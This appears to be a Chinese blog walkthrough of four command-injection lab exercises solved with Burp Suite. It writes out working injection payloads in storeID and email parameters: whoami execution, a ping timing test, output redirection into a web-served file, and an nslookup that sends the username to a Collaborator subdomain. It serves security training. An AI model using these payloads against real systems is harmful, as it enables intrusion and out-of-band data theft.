命令注入靶场练习

1、whoami

实验操作
使用 Burp Suite 拦截并修改检查库存水平的请求。
修改storeID参数,为其指定值1|whoami。
请注意,响应包含当前用户的名称。

image.png

2、||ping+-c+10+127.0.0.1||

实验操作
使用Burp Suite拦截并修改提交反馈的请求。
修改email参数,改为:
email=x||ping+-c+10+127.0.0.1||
请注意,响应需要 10 秒才能返回。

image.png

3、||whoami>/var/www/images/output.txt||

实验操作
使用Burp Suite拦截并修改提交反馈的请求。
修改email参数,改为:
email=||whoami>/var/www/images/output.txt||
现在使用 Burp Suite 拦截并修改加载产品图像的请求。
修改filename参数,将值更改为您为注入命令的输出指定的文件的名称:
filename=output.txt
观察响应包含注入命令的输出。

image.png

4、||nslookup+`whoami`.BURP-COLLABORATOR-SUBDOMAIN||

实验操作
使用Burp Suite拦截并修改提交反馈的请求。
修改email参数,改为:
email=x||nslookup+x.BURP-COLLABORATOR-SUBDOMAIN||
右键单击并选择“插入 Collaborator 负载”以在修改的email参数中指示的位置插入 Burp Collaborator 子域。

image.png

image.png

©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容